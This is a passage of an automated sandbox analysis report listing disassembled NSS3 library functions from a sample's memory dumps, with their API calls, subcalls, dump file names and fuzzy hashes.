                                                                                • Instruction ID: 1de5005949563e50742474a1a7e7cebff3854c06a8e278dc6c24a3debd920872
                                                                                • Opcode Fuzzy Hash: d02ffc632d8ad261353f72ab84cfaba4ac1b27f906d05ee57643c668524defc1
                                                                                • Instruction Fuzzy Hash: AA1184B19042009FFB908F6AAE0779AFBB89367218F100139E52DDB745EBF144844BDB
                                                                                Function 6CFE1CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Initialize), ref: 6CFE1CD8
                                                                                • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CFE1CF1
                                                                                  • Part of subcall function 6D0C09D0: PR_Now.NSS3 ref: 6D0C0A22
                                                                                  • Part of subcall function 6D0C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D0C0A35
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D0C0A66
                                                                                  • Part of subcall function 6D0C09D0: PR_GetCurrentThread.NSS3 ref: 6D0C0A70
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D0C0A9D
                                                                                  • Part of subcall function 6D0C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D0C0AC8
                                                                                  • Part of subcall function 6D0C09D0: PR_vsmprintf.NSS3(?,?), ref: 6D0C0AE8
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0B19
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0B48
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0C76
                                                                                  • Part of subcall function 6D0C09D0: PR_LogFlush.NSS3 ref: 6D0C0C7E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                • API String ID: 1907330108-3943720641
                                                                                • Opcode ID: 8805bcc0b321bc4495b95b59fa6f771292df621ce397fb7cb1b10ff1bb3dbd49
                                                                                • Instruction ID: cecb366a17b50af98f502544d79dbc08b5010f2082e381d25b66b0a5f5b1092e
                                                                                • Opcode Fuzzy Hash: 8805bcc0b321bc4495b95b59fa6f771292df621ce397fb7cb1b10ff1bb3dbd49
                                                                                • Instruction Fuzzy Hash: A601D275500100EFDF209B56EE0BB5933B5EB8B319F048024E41AD3212DBB0D885C792
                                                                                Function 6D021D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6D021D8F
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D021DA6
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D021E13
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D021ED0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                • String ID:
                                                                                • API String ID: 84796498-0
                                                                                • Opcode ID: 90775d8d101b8eb0704734806d94e32c8c87507c4932732b07ea5443e74496c2
                                                                                • Instruction ID: d980095298cadca320e0772a79c0c4b9e73a3f1d0d31195e9b419e88125eac0f
                                                                                • Opcode Fuzzy Hash: 90775d8d101b8eb0704734806d94e32c8c87507c4932732b07ea5443e74496c2
                                                                                • Instruction Fuzzy Hash: 65517A71A05209DBEF14CF94CC84BAEB7F6BF49318F108129D9199B250D772A945CB81
                                                                                Function 6D03AC80 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFD074,00000000), ref: 6D03AD13
                                                                                • memcmp.VCRUNTIME140(?,?,?), ref: 6D03AD65
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D03AD95
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D03ADC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Item_Util$CopyErrorZfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 2638228310-0
                                                                                • Opcode ID: 6a323f8587d93fe94457a8d6c5375ae1d0184821735b330ec5644d61f4a470f2
                                                                                • Instruction ID: 7663988eacb080c5a122d9b88c470de1bd573fb27db116774190e160b5ab0004
                                                                                • Opcode Fuzzy Hash: 6a323f8587d93fe94457a8d6c5375ae1d0184821735b330ec5644d61f4a470f2
                                                                                • Instruction Fuzzy Hash: 9341CF71E04226ABEF10CB69DC85FAFB3B9EF45304F664124ED15AB281E730E944C7A1
                                                                                Function 6D023D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6D02127F,?), ref: 6D023D89
                                                                                  • Part of subcall function 6D0206F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6D022E70,00000000), ref: 6D020701
                                                                                • SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6D023DD3
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Error$HashLookupTableUtil$Alloc_ConstFind
                                                                                • String ID:
                                                                                • API String ID: 99596740-0
                                                                                • Opcode ID: d0dedaa8d4bf974f398f42c2ad4a6326f43a1ed8a8a4944fd1274f6eb7b57279
                                                                                • Instruction ID: afaf5884542488c4d290337249529d3c1da48f8afb416f7ebf6acb83108bf0fa
                                                                                • Opcode Fuzzy Hash: d0dedaa8d4bf974f398f42c2ad4a6326f43a1ed8a8a4944fd1274f6eb7b57279
                                                                                • Instruction Fuzzy Hash: 37313431E1B52697FF148628AC40B7A72E4EB4D338F54463EDE15C7AC0EB22EC0586C2
                                                                                Function 6D087DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087E10
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087EA6
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087EB5
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D087ED8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong
                                                                                • String ID:
                                                                                • API String ID: 4101233201-0
                                                                                • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                • Instruction ID: a82b5a26ccfd5eab36c356d9dd7f858aece6a1eb63f3b6556ad9f29a1827bace
                                                                                • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                • Instruction Fuzzy Hash: 103163B2E002118FEB04CF08D891A9EBBE2BFCC21471B8569D9595B316EB75EC45CBD1
                                                                                Function 6D022C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE002,00000000,?,6D021289,?), ref: 6D022D72
                                                                                  • Part of subcall function 6D023390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6D022CA7,E80C76FF,?,6D021289,?), ref: 6D0233E9
                                                                                  • Part of subcall function 6D023390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6D02342E
                                                                                • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D021289,?), ref: 6D022D61
                                                                                  • Part of subcall function 6D020B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D020B21
                                                                                  • Part of subcall function 6D020B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D020B64
                                                                                • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6D021289,?), ref: 6D022D88
                                                                                • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6D021289,?), ref: 6D022DAF
                                                                                  • Part of subcall function 6CFDB8F0: PR_CallOnceWithArg.NSS3(6D112178,6CFDBCF0,?), ref: 6CFDB915
                                                                                  • Part of subcall function 6CFDB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CFDB933
                                                                                  • Part of subcall function 6CFDB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CFDB9C8
                                                                                  • Part of subcall function 6CFDB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CFDB9E1
                                                                                  • Part of subcall function 6D020A50: SECOID_GetAlgorithmTag_Util.NSS3(6D022A90,E8571076,?,6D022A7C,6D0221F1,?,?,?,00000000,00000000,?,?,6D0221DD,00000000), ref: 6D020A66
                                                                                  • Part of subcall function 6D023310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6D022D1E,?,?,?,?,00000000,?,?,?,?,?,6D021289), ref: 6D023348
                                                                                  • Part of subcall function 6D0206F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6D022E70,00000000), ref: 6D020701
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                • String ID:
                                                                                • API String ID: 2288138528-0
                                                                                • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction ID: 8d1a1dfa9796d649bdb885bbf8f545b3dd26c58178515afb37469108903cc47d
                                                                                • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction Fuzzy Hash: 563108B2D16201ABFB108EB4EC41B6A37A9BF45319F050130ED149B791E731E964C7A2
                                                                                Function 6CFB6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFB6C8D
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFB6CA9
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CFB6CC0
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D0D8FE0), ref: 6CFB6CFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                • String ID:
                                                                                • API String ID: 2370200771-0
                                                                                • Opcode ID: 7cefa741a038173a20b118124335881fd97624bf520e130cf43c1103c53d5415
                                                                                • Instruction ID: 5780cce4382c46b31a10ab923c450d9d65034a52b435388c0fe7bd778025b089
                                                                                • Opcode Fuzzy Hash: 7cefa741a038173a20b118124335881fd97624bf520e130cf43c1103c53d5415
                                                                                • Instruction Fuzzy Hash: 333194B5A002169FEB08DF66C891A7FBBF5EF49248F14453DE905E7350EB719901CBA0
                                                                                Function 6D026DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026E36
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D026E57
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026E7D
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6D026EAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: IntervalMilliseconds$ErrorValue
                                                                                • String ID:
                                                                                • API String ID: 3163584228-0
                                                                                • Opcode ID: 060fae49f5ed3f680292b623915df0e53a428ca2786a2f3d0e27dd802c84fff0
                                                                                • Instruction ID: 83f21e05dbd4a12b3d758c870dd0bf87172362e7b27e5c6803906a0e0f267c58
                                                                                • Opcode Fuzzy Hash: 060fae49f5ed3f680292b623915df0e53a428ca2786a2f3d0e27dd802c84fff0
                                                                                • Instruction Fuzzy Hash: B131E131625513EEFF141F34DD053A6B7A4BB0532AF90463DD89A97240EB306454CBC1
                                                                                Function 6D00DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DDF4
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DE0B
                                                                                • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6D00DDB1,?,00000000), ref: 6D00DE17
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PR_SetError.NSS3(FFFFE009,00000000), ref: 6D00DE80
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                • String ID:
                                                                                • API String ID: 3725328900-0
                                                                                • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                • Instruction ID: f95af28b675bb447243b81dfb0402efc6e8dfc02dcad77581b8d88f252cde972
                                                                                • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                • Instruction Fuzzy Hash: CC3195B1904782ABF700CF56D890766F7E4BFE5318B15822ADA1987B01E774E5A0CBA1
                                                                                Function 6D030C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_DigestOp.NSS3(?,?,00000004), ref: 6D030C43
                                                                                  • Part of subcall function 6CFDDEF0: TlsGetValue.KERNEL32 ref: 6CFDDF37
                                                                                  • Part of subcall function 6CFDDEF0: EnterCriticalSection.KERNEL32(?), ref: 6CFDDF4B
                                                                                  • Part of subcall function 6CFDDEF0: PR_SetError.NSS3(00000000,00000000), ref: 6CFDE02B
                                                                                  • Part of subcall function 6CFDDEF0: PR_Unlock.NSS3(?), ref: 6CFDE07E
                                                                                • PK11_DigestOp.NSS3(?,?,00000008), ref: 6D030C85
                                                                                • PK11_DigestOp.NSS3(?,?,?), ref: 6D030C9F
                                                                                • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6D030CB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3186484790-0
                                                                                • Opcode ID: 5c2ae60cab310919b250bbfbad397481437a2d0b961973e0bacaca43b6e4325f
                                                                                • Instruction ID: 58a06423a9d102ae999b68e2baac15ec1358889353553b302a33df5455f137b2
                                                                                • Opcode Fuzzy Hash: 5c2ae60cab310919b250bbfbad397481437a2d0b961973e0bacaca43b6e4325f
                                                                                • Instruction Fuzzy Hash: 7F2108716082579FD701CF789C05BAABBE4AF25204F0A81A5E9445F352E721D928C7B6
                                                                                Function 6D022DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6D022E08
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6D022E1C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6D022E3B
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D022E95
                                                                                  • Part of subcall function 6D011200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D011228
                                                                                  • Part of subcall function 6D011200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D011238
                                                                                  • Part of subcall function 6D011200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D01124B
                                                                                  • Part of subcall function 6D011200: PR_CallOnce.NSS3(6D112AA4,6D0112D0,00000000,00000000,00000000,?,6CFB88A4,00000000,00000000), ref: 6D01125D
                                                                                  • Part of subcall function 6D011200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D01126F
                                                                                  • Part of subcall function 6D011200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D011280
                                                                                  • Part of subcall function 6D011200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D01128E
                                                                                  • Part of subcall function 6D011200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D01129A
                                                                                  • Part of subcall function 6D011200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D0112A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
